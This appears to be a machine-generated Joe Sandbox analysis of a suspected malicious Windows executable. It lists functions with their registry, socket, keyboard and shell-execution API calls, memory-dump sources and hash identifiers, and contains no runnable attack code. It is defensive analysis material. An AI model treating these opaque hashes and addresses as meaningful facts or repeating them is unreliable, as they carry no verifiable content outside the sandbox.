                                                                                        • Instruction Fuzzy Hash: 9F110D7670D757BAEB055B54AC82EEA739CDF16B20F20003AF510E52C1EBF4EA007265
                                                                                        Function 00F2A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00F2A806
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafeVartype
                                                                                        • String ID:
                                                                                        • API String ID: 1725837607-0
                                                                                        • Opcode ID: e89f1b32892d3617f9959398e6832f37ff8dceac370f924475c9f079b32fd5ed
                                                                                        • Instruction ID: 0f789b196845befb7eefdeb4bceaf0a45e2d02af68e9d9a8fd810fb84d34b566
                                                                                        • Opcode Fuzzy Hash: e89f1b32892d3617f9959398e6832f37ff8dceac370f924475c9f079b32fd5ed
                                                                                        • Instruction Fuzzy Hash: DFC17D75A0422ADFDB04CF98E891BAEB7F4FF08311F204469E615E7241D778AA41DF91
                                                                                        Function 00F26B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F26B63
                                                                                        • LoadStringW.USER32(00000000), ref: 00F26B6A
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F26B80
                                                                                        • LoadStringW.USER32(00000000), ref: 00F26B87
                                                                                        • _wprintf.LIBCMT ref: 00F26BAD
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F26BCB
                                                                                        Strings
                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00F26BA8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                        • API String ID: 3648134473-3128320259
                                                                                        • Opcode ID: 1cba97c075b308d216b253f34183710e6e30b9e57c0a7d608ddf8976bd84ad79
                                                                                        • Instruction ID: 435d21ec07a9a3ea33654f26db1766948e18b993a395b1a95a6cf71807644415
                                                                                        • Opcode Fuzzy Hash: 1cba97c075b308d216b253f34183710e6e30b9e57c0a7d608ddf8976bd84ad79
                                                                                        • Instruction Fuzzy Hash: 020112F690025C7FEB11A7A49D89EE6766CE708304F444492F756E2041EAB49E84AB71
                                                                                        Function 00F42B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F42BB5,?,?), ref: 00F43C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F42BF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharConnectRegistryUpper
                                                                                        • String ID:
                                                                                        • API String ID: 2595220575-0
                                                                                        • Opcode ID: 4256be6b2a537393dcc17fcd62da8d0dd5c32b03a2b25873a87ed10743fa5e59
                                                                                        • Instruction ID: d3f8d18747b558956fbecac035bf9ff4575f9c9fffaed9a1d3ee3b1c2e582e7a
                                                                                        • Opcode Fuzzy Hash: 4256be6b2a537393dcc17fcd62da8d0dd5c32b03a2b25873a87ed10743fa5e59
                                                                                        • Instruction Fuzzy Hash: 74918E71A04205AFC710EF15C891B6EBBF5FF88310F54881DFA96972A2DB74E905EB42
                                                                                        Function 00F395BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • select.WSOCK32 ref: 00F39691
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00F3969E
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00F396C8
                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F396E9
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00F396F8
                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00F397AA
                                                                                        • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00F7DC00), ref: 00F39765
                                                                                          • Part of subcall function 00F1D2FF: _strlen.LIBCMT ref: 00F1D309
                                                                                        • _strlen.LIBCMT ref: 00F39800
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                        • String ID:
                                                                                        • API String ID: 3480843537-0
                                                                                        • Opcode ID: 4d0c272e3203625247ceed4fb4436567d31889f418bcf44398d7805a6796a27b
                                                                                        • Instruction ID: f9e295770e27bbcc53bd44f33dd0c8e1cc6189e70923946ee4513d291170ab6c
                                                                                        • Opcode Fuzzy Hash: 4d0c272e3203625247ceed4fb4436567d31889f418bcf44398d7805a6796a27b
                                                                                        • Instruction Fuzzy Hash: 8E81E031508244ABC710EF65DC86F6BB7E8EF88720F104A1DF555AB2A1EBB0DD05DB92
                                                                                        Function 00F0A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __mtinitlocknum.LIBCMT ref: 00F0A991
                                                                                          • Part of subcall function 00F07D7C: __FF_MSGBANNER.LIBCMT ref: 00F07D91
                                                                                          • Part of subcall function 00F07D7C: __NMSG_WRITE.LIBCMT ref: 00F07D98
                                                                                          • Part of subcall function 00F07D7C: __malloc_crt.LIBCMT ref: 00F07DB8
                                                                                        • __lock.LIBCMT ref: 00F0A9A4
                                                                                        • __lock.LIBCMT ref: 00F0A9F0
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00F96DE0,00000018,00F15E7B,?,00000000,00000109), ref: 00F0AA0C
                                                                                        • EnterCriticalSection.KERNEL32(8000000C,00F96DE0,00000018,00F15E7B,?,00000000,00000109), ref: 00F0AA29
                                                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 00F0AA39
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 1422805418-0
                                                                                        • Opcode ID: da5f5c69960ad7295071dd2b8d10fe9e8ddb7cdac6bc1ba56628ab917b7fec82
                                                                                        • Instruction ID: 3732805351b9076b6d7f518785403d80deb94ea1c220e336b5348b2360546261
                                                                                        • Opcode Fuzzy Hash: da5f5c69960ad7295071dd2b8d10fe9e8ddb7cdac6bc1ba56628ab917b7fec82
                                                                                        • Instruction Fuzzy Hash: DB4104B1F00709DBEB249F68DE4575DB7A0AF05335F108219E425AB2E1DBB89940FB92
                                                                                        Function 00F48ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 00F48EE4
                                                                                        • GetDC.USER32(00000000), ref: 00F48EEC
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F48EF7
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00F48F03
                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00F48F3F
                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F48F50
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F4BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00F48F8A
                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F48FAA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3864802216-0
                                                                                        • Opcode ID: c5bc953780ea506e4d92df6e54befec2ca55013fb0f0487882eac214024e3323
                                                                                        • Instruction ID: 32fd0cbeddd96bd64394159eec13a007adb55ac5fe696e812666b0e1f28ffe77
                                                                                        • Opcode Fuzzy Hash: c5bc953780ea506e4d92df6e54befec2ca55013fb0f0487882eac214024e3323
                                                                                        • Instruction Fuzzy Hash: 00317F72600214BFEB108F54CC49FEA3FADEF49765F044065FE199A191C6B69842DB70
                                                                                        Function 00F316DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                          • Part of subcall function 00EFC6F4: _wcscpy.LIBCMT ref: 00EFC717
                                                                                        • _wcstok.LIBCMT ref: 00F3184E
                                                                                        • _wcscpy.LIBCMT ref: 00F318DD
                                                                                        • _memset.LIBCMT ref: 00F31910
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                        • String ID: X
                                                                                        • API String ID: 774024439-3081909835
                                                                                        • Opcode ID: 5a327c34dcccec1f602b07fa96896821a948028e097bf04f9c93bfed850a87d4
                                                                                        • Instruction ID: 2d33f3f8743723d13e91f7c2f19818a6420ade48886937ac0b669b2a21cd6674
                                                                                        • Opcode Fuzzy Hash: 5a327c34dcccec1f602b07fa96896821a948028e097bf04f9c93bfed850a87d4
                                                                                        • Instruction Fuzzy Hash: BEC191356083849FC724EF64C981A5EB7E4FF85360F00496DF999A72A2DB30ED05DB92
                                                                                        Function 00F50133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00F5016D
                                                                                        • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00F5038D
                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F503AB
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00F503D6
                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F503FF
                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 00F50421
                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00F50440
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                        • String ID:
                                                                                        • API String ID: 3356174886-0
                                                                                        • Opcode ID: b4e77c923b705cd2ef8a5c4c6eda02bd0e6207dc0572fd3c4b8c580f905d1426
                                                                                        • Instruction ID: 937a2668ef5ba3fde83965552e90b8a1c8d5d872c30dcfb701541d92c3f7e467
                                                                                        • Opcode Fuzzy Hash: b4e77c923b705cd2ef8a5c4c6eda02bd0e6207dc0572fd3c4b8c580f905d1426
                                                                                        • Instruction Fuzzy Hash: C0A1E231A00616EFDB18CF68C9857BDBBB1BF04752F048115EE54E7290DB74AD54EB90
                                                                                        Function 00EFAE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3c933ce1d9e643199c7e67f74c4aeba0ff020dc6c6fa7c2eb9cde64c1ffe6fb2
                                                                                        • Instruction ID: 41c41db99954c073182824cb86ab4284ff6df32abb683c8c43387178d6a1302b
                                                                                        • Opcode Fuzzy Hash: 3c933ce1d9e643199c7e67f74c4aeba0ff020dc6c6fa7c2eb9cde64c1ffe6fb2
                                                                                        • Instruction Fuzzy Hash: A6715CB1A00109EFCB14CF98CC49ABEBB79FF85314F188159FA19AA255C730AA41DB61
                                                                                        Function 00F42230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F4225A
                                                                                        • _memset.LIBCMT ref: 00F42323
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00F42368
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                          • Part of subcall function 00EFC6F4: _wcscpy.LIBCMT ref: 00EFC717
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F4242F
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00F4243E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                        • String ID: @
                                                                                        • API String ID: 4082843840-2766056989
                                                                                        • Opcode ID: 1c7d70de37aa4e62422429da35b2c4d6a039ed642d677848d40f7b00a2aa6e42
                                                                                        • Instruction ID: 1984f77fb36ed5f130e2d3fcba0a8669243c88fa77c8d7be48d9e97806096fc3
                                                                                        • Opcode Fuzzy Hash: 1c7d70de37aa4e62422429da35b2c4d6a039ed642d677848d40f7b00a2aa6e42
                                                                                        • Instruction Fuzzy Hash: 95715E75A006199FCF04EFA5D9819AEBBF5FF48310F108469E855BB3A2DB34AD40DB90
                                                                                        Function 00F23DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 00F23DE7
                                                                                        • GetKeyboardState.USER32(?), ref: 00F23DFC
                                                                                        • SetKeyboardState.USER32(?), ref: 00F23E5D
                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F23E8B
                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F23EAA
                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F23EF0
                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F23F13
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: 5917f41153d9376fefa9b4b8e0811f198c030178de8d563744eb203da95ebb6f
                                                                                        • Instruction ID: 1c89243ad14900a570b90782bd102ab22452d4ae8d4dba2efdee218e6ecfec0c
                                                                                        • Opcode Fuzzy Hash: 5917f41153d9376fefa9b4b8e0811f198c030178de8d563744eb203da95ebb6f
                                                                                        • Instruction Fuzzy Hash: 2251D2E0E047E53DFB364324AC45BBA7EA95B06314F084589E1D9468C2D3ECAED8F750
                                                                                        Function 00F23BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32(00000000), ref: 00F23C02
                                                                                        • GetKeyboardState.USER32(?), ref: 00F23C17
                                                                                        • SetKeyboardState.USER32(?), ref: 00F23C78
                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F23CA4
                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F23CC1
                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F23D05
                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F23D26
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: 21c8a5ae5f830d07d9a33a8f301b972f24e6ebe7c19ff4f09c51d79a65a99bc2
                                                                                        • Instruction ID: 81d59f231364d9ae90e79ea27569a4d2e165e48652f60e2a34fb339a8ad4746e
                                                                                        • Opcode Fuzzy Hash: 21c8a5ae5f830d07d9a33a8f301b972f24e6ebe7c19ff4f09c51d79a65a99bc2
                                                                                        • Instruction Fuzzy Hash: 805106E0A447E93DFB328724DC45B76BF99AB06310F088489E1D55A8C2D298EE94F750
                                                                                        Function 00F27DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                        • String ID:
                                                                                        • API String ID: 2945705084-0
                                                                                        • Opcode ID: cfa142cf4c881c606a2c5fd8fbe95c321308153daf46683c73fef591b006d385
                                                                                        • Instruction ID: 0e337fb266b5574d709702ac81d9d2734ee35bf5764e5e3be5e0fd7e6177a3f2
                                                                                        • Opcode Fuzzy Hash: cfa142cf4c881c606a2c5fd8fbe95c321308153daf46683c73fef591b006d385
                                                                                        • Instruction Fuzzy Hash: C4415C66D14314B6DB10EBF4CC4AACFB7ACAF05310F518966E518E31A1FA38E614A3A5
                                                                                        Function 00F43D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00F43DA1
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F43DCB
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00F43E80
                                                                                          • Part of subcall function 00F43D72: RegCloseKey.ADVAPI32(?), ref: 00F43DE8
                                                                                          • Part of subcall function 00F43D72: FreeLibrary.KERNEL32(?), ref: 00F43E3A
                                                                                          • Part of subcall function 00F43D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F43E5D
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F43E25
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
